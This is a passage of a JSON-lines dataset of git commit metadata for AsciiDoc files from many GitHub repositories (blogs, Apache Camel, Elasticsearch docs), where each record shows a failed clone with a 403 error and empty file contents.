file\n","repos":"gravitee-io\/gravitee-policy-transform-queryparameters","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-transform-queryparameters.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"135f286088136973528584c937d47cef8a0a9f6f","subject":"Add CONTRIBUTING.adoc","message":"Add CONTRIBUTING.adoc","repos":"crawsible\/pivnet-resource,pivotal-cf-experimental\/pivnet-resource,pivotal-cf-experimental\/pivnet-resource,crawsible\/pivnet-resource","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crawsible\/pivnet-resource.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"01fa4e1496b900ebd5475890f187924bf715e66c","subject":"Update 2017-09-22-Node-Red.adoc","message":"Update 2017-09-22-Node-Red.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-09-22-Node-Red.adoc","new_file":"_posts\/2017-09-22-Node-Red.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb14522a13f90faeadf0e9b98b0159573755bae0","subject":"Update 2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","message":"Update 2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","new_file":"_posts\/2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d26269c6c3f1f873367575e4d2e1e685f10ec63","subject":"Update 2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc","message":"Update 2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc","new_file":"_posts\/2017-07-21-101-Tips-To-Improve-Your-Relationship.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ff065b7ff900df66cbda52235d446d76412bd0a","subject":"Spaces","message":"Spaces\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Git branching.adoc","new_file":"Git\/Git branching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3da29e698e5fc1d51fcca315c915c56a3f4a180","subject":"Changed forwarding reference to rvalue reference","message":"Changed forwarding reference to rvalue reference\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cf9a8ab0b5c119cefc3206085e6449bfa48a7c99","subject":"Added more references","message":"Added more references\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"679f66862b0c62bcbee4ee309df0a52fa67f22fd","subject":"Add instruction on how to install the latest release","message":"Add instruction on how to install the latest release\n","repos":"debbbbie\/asciidoctor-firefox-addon,asciidoctor\/asciidoctor-firefox-addon,Mogztter\/asciidoctor-firefox-addon","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mogztter\/asciidoctor-firefox-addon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4f1eed830bdecda451cc605a2038cb9156c0ace","subject":"Create do-explore-open-source-projects-fil.adoc","message":"Create do-explore-open-source-projects-fil.adoc\n\nFilipino translation for do-explore-open-source-projects.adoc","repos":"eddiejaoude\/book-open-source-tips","old_file":"src\/do\/do-explore-open-source-projects-fil.adoc","new_file":"src\/do\/do-explore-open-source-projects-fil.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eddiejaoude\/book-open-source-tips.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da05c69ad52f1686c3e75a9470971bce174d749e","subject":"Update 2016-01-08-Title.adoc","message":"Update 2016-01-08-Title.adoc","repos":"smirnoffs\/smirnoffs.github.io,smirnoffs\/smirnoffs.github.io,smirnoffs\/smirnoffs.github.io","old_file":"_posts\/2016-01-08-Title.adoc","new_file":"_posts\/2016-01-08-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smirnoffs\/smirnoffs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"363b031b34569f31949971afe834f9723148af84","subject":"Update 2018-07-05-Dart1.adoc","message":"Update 2018-07-05-Dart1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-05-Dart1.adoc","new_file":"_posts\/2018-07-05-Dart1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f13930cc8b7548031845b36166df994ef065f67","subject":"y2b create post iPod Nano 6th Generation Unboxing \\u0026 Overview","message":"y2b create post iPod Nano 6th Generation Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-11-iPod-Nano-6th-Generation-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-11-iPod-Nano-6th-Generation-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8992850758f26ce30aece7a114c7272ea836d046","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e61aefa0ba366e142763dfde3427791763671e5","subject":"Create sample.adoc","message":"Create sample.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"lib\/smru-inline-macros\/sample.adoc","new_file":"lib\/smru-inline-macros\/sample.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fac2b78bc8d2e282f09eb6970baf4e0224b13421","subject":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","message":"Update 2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_file":"_posts\/2017-11-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82fd546501c7120e18aca846afce7d418e840e91","subject":"y2b create post $99 Virtual Reality!","message":"y2b create post $99 Virtual Reality!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-06-09-99-Virtual-Reality.adoc","new_file":"_posts\/2015-06-09-99-Virtual-Reality.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b116a5e31d344d06dc2041d2c1370cd73fbed8ef","subject":"Update 2016-04-11-My-first-Blog-Post.adoc","message":"Update 2016-04-11-My-first-Blog-Post.adoc","repos":"RussellSnyder\/hubpress-test,RussellSnyder\/hubpress-test,RussellSnyder\/hubpress-test,RussellSnyder\/hubpress-test","old_file":"_posts\/2016-04-11-My-first-Blog-Post.adoc","new_file":"_posts\/2016-04-11-My-first-Blog-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RussellSnyder\/hubpress-test.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bb78ed986889ca61acc8b8494fd257c9a68e8a3","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a838dfe48a7124696aba236763042dd2626d9430","subject":"Update 2016-03-29-First-Post.adoc","message":"Update 2016-03-29-First-Post.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-03-29-First-Post.adoc","new_file":"_posts\/2016-03-29-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5ae9a1fd13b442e14b8ceb36a605bac2f754b3d","subject":"Update 2018-08-30-Docker-bro.adoc","message":"Update 2018-08-30-Docker-bro.adoc","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2018-08-30-Docker-bro.adoc","new_file":"_posts\/2018-08-30-Docker-bro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"515daa90f385ed705a44b1792513561cbb637380","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/hello_world.adoc","new_file":"content\/writings\/hello_world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f33a41631a9f79a0a4b5322f36c6d7898a4b2017","subject":"CAMEL-16341 - Having a middle folder for vertx components","message":"CAMEL-16341 - Having a middle folder for vertx components\n","repos":"tdiesler\/camel,tadayosi\/camel,nikhilvibhav\/camel,cunningt\/camel,nikhilvibhav\/camel,pax95\/camel,cunningt\/camel,tadayosi\/camel,nikhilvibhav\/camel,adessaigne\/camel,tdiesler\/camel,tdiesler\/camel,christophd\/camel,pax95\/camel,cunningt\/camel,cunningt\/camel,apache\/camel,tdiesler\/camel,adessaigne\/camel,tadayosi\/camel,adessaigne\/camel,tdiesler\/camel,tadayosi\/camel,apache\/camel,pax95\/camel,christophd\/camel,tadayosi\/camel,christophd\/camel,christophd\/camel,tdiesler\/camel,adessaigne\/camel,cunningt\/camel,nikhilvibhav\/camel,tadayosi\/camel,apache\/camel,cunningt\/camel,pax95\/camel,christophd\/camel,apache\/camel,pax95\/camel,adessaigne\/camel,adessaigne\/camel,christophd\/camel,apache\/camel,pax95\/camel,apache\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/vertx-kafka-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/vertx-kafka-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da6127d6bb6d921e5f7754adaa8fad9230bf4c7e","subject":"Update 2015-05-11-Speaking-at-GeeCON-2015-about-Ratpack.adoc","message":"Update 2015-05-11-Speaking-at-GeeCON-2015-about-Ratpack.adoc","repos":"alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io","old_file":"_posts\/2015-05-11-Speaking-at-GeeCON-2015-about-Ratpack.adoc","new_file":"_posts\/2015-05-11-Speaking-at-GeeCON-2015-about-Ratpack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alvarosanchez\/alvarosanchez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d2748a6edfec152d4d4a3ec0dee32952a4323a8","subject":"Update 2016-09-01-Episode-70-Questions-Answered-Sort-Of.adoc","message":"Update 2016-09-01-Episode-70-Questions-Answered-Sort-Of.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-09-01-Episode-70-Questions-Answered-Sort-Of.adoc","new_file":"_posts\/2016-09-01-Episode-70-Questions-Answered-Sort-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08ff3914fd85cf184c9f0a5a5a03456082297afe","subject":"[DOCS] Correct over field usage for freq rare function (elastic\/x-pack-elasticsearch#3435)","message":"[DOCS] Correct over field usage for freq rare function (elastic\/x-pack-elasticsearch#3435)\n\nOriginal commit: elastic\/x-pack-elasticsearch@2b315610b93d327e7f5473c8db9f1edc6f79e695\n","repos":"robin13\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/en\/ml\/functions\/rare.asciidoc","new_file":"docs\/en\/ml\/functions\/rare.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0f49615567bdef64d110e0ce3f7db527d832302c","subject":"Update 2016-08-17-Moving-From-Java-To-Scala.adoc","message":"Update 2016-08-17-Moving-From-Java-To-Scala.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-08-17-Moving-From-Java-To-Scala.adoc","new_file":"_posts\/2016-08-17-Moving-From-Java-To-Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0def4ced9b534612f208ce0b2da1e547b4ff3ef","subject":"Update 2016-09-15-Episode-72-The-Money-Shot.adoc","message":"Update 2016-09-15-Episode-72-The-Money-Shot.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-09-15-Episode-72-The-Money-Shot.adoc","new_file":"_posts\/2016-09-15-Episode-72-The-Money-Shot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2729164e36a0f3da3571b728b931ad7941340003","subject":"y2b create post Simple Audio Listen Unboxing \\u0026 Test","message":"y2b create post Simple Audio Listen Unboxing \\u0026 Test","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-12-17-Simple-Audio-Listen-Unboxing-u0026-Test.adoc","new_file":"_posts\/2013-12-17-Simple-Audio-Listen-Unboxing-u0026-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bedabc5fd541c286182eb75587ecf2b2d81b96de","subject":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","message":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cca8b0dc8b055b330d5343100c85536ac90e1bba","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3a5faea4fedd6d80425df640d021b2a41ec559b","subject":"added week4 content","message":"added week4 content\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b4bf43a55fc6360f71d8032e6baecb93dd7cd848","subject":"Update 2016-11-07-Trees.adoc","message":"Update 2016-11-07-Trees.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-11-07-Trees.adoc","new_file":"_posts\/2016-11-07-Trees.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67bd9f1f0d10bc14b45114a790e85b611d9d9470","subject":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","message":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa3adad65cfbc99cb5c49d4dd97287840ad69d1b","subject":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","message":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3912d2e55a41680ec65632f252a99af722643c44","subject":"Starting moving old release notes for the new site, from 2.17.0 ahead. Release 2.17.0 added","message":"Starting moving old release notes for the new site, from 2.17.0 ahead. Release 2.17.0 added\n","repos":"CodeSmell\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,anoordover\/camel,Fabryprog\/camel,mcollovati\/camel,DariusX\/camel,objectiser\/camel,tadayosi\/camel,anoordover\/camel,davidkarlsen\/camel,anoordover\/camel,nikhilvibhav\/camel,kevinearls\/camel,apache\/camel,davidkarlsen\/camel,onders86\/camel,punkhorn\/camel-upstream,cunningt\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,sverkera\/camel,pmoerenhout\/camel,gnodet\/camel,pmoerenhout\/camel,onders86\/camel,pmoerenhout\/camel,tdiesler\/camel,pmoerenhout\/camel,mcollovati\/camel,mcollovati\/camel,alvinkwekel\/camel,gnodet\/camel,zregvart\/camel,pax95\/camel,objectiser\/camel,christophd\/camel,nicolaferraro\/camel,pmoerenhout\/camel,tdiesler\/camel,jamesnetherton\/camel,christophd\/camel,sverkera\/camel,kevinearls\/camel,adessaigne\/camel,jamesnetherton\/camel,tadayosi\/camel,DariusX\/camel,punkhorn\/camel-upstream,pax95\/camel,gnodet\/camel,tdiesler\/camel,gnodet\/camel,ullgren\/camel,apache\/camel,kevinearls\/camel,tadayosi\/camel,zregvart\/camel,christophd\/camel,CodeSmell\/camel,anoordover\/camel,sverkera\/camel,tdiesler\/camel,onders86\/camel,kevinearls\/camel,pax95\/camel,kevinearls\/camel,jamesnetherton\/camel,cunningt\/camel,anoordover\/camel,apache\/camel,CodeSmell\/camel,objectiser\/camel,kevinearls\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,onders86\/camel,adessaigne\/camel,DariusX\/camel,tdiesler\/camel,pmoerenhout\/camel,onders86\/camel,apache\/camel,christophd\/camel,cunningt\/camel,anoordover\/camel,Fabryprog\/camel,cunningt\/camel,jamesnetherton\/camel,objectiser\/camel,tdiesler\/camel,ullgren\/camel,Fabryprog\/camel,christophd\/camel,adessaigne\/camel,punkhorn\/camel-upstream,apache\/camel,mcollovati\/camel,adessaigne\/camel,sverkera\/camel,apache\/camel,alvinkwekel\/camel,jamesnetherton\/camel,alvinkwekel\/camel,pax95\/camel,pax95\/camel,onders86\/camel,alvinkwekel\/camel,pax95\/camel,Fabryprog\/camel,tadayosi\/camel,davidkarlsen\/camel,tadayosi\/camel,nikhilvibhav\/camel,gnodet\/camel,ullgren\/camel,CodeSmell\/camel,sverkera\/camel,tadayosi\/camel,zregvart\/camel,adessaigne\/camel,zregvart\/camel,cunningt\/camel,ullgren\/camel,DariusX\/camel,adessaigne\/camel,nicolaferraro\/camel,cunningt\/camel,nicolaferraro\/camel,christophd\/camel,sverkera\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2170-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2170-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ca86c4fd2e5f0a8a42d15769a33183eb8e736021","subject":"Publish 2016-10-12.adoc","message":"Publish 2016-10-12.adoc","repos":"pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io","old_file":"2016-10-12.adoc","new_file":"2016-10-12.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pokev25\/pokev25.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff060d15c69c6f6e72e0fe8749552de43d21f9c0","subject":"Update 2015-03-18-The-Docs-Guy.adoc","message":"Update 2015-03-18-The-Docs-Guy.adoc","repos":"HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io","old_file":"_posts\/2015-03-18-The-Docs-Guy.adoc","new_file":"_posts\/2015-03-18-The-Docs-Guy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"803906ca7e852f325cc85dadcec25bbf688a30de","subject":"Update 2015-11-23-Konu-Basligi.adoc","message":"Update 2015-11-23-Konu-Basligi.adoc","repos":"mhmtbsbyndr\/mhmtbsbyndr.github.io,mhmtbsbyndr\/mhmtbsbyndr.github.io,mhmtbsbyndr\/mhmtbsbyndr.github.io","old_file":"_posts\/2015-11-23-Konu-Basligi.adoc","new_file":"_posts\/2015-11-23-Konu-Basligi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mhmtbsbyndr\/mhmtbsbyndr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"425ae42582cadd1d09990e23750c5212d3e0ba51","subject":"Update 2017-03-10-Por-que-escolher-Native-Script.adoc","message":"Update 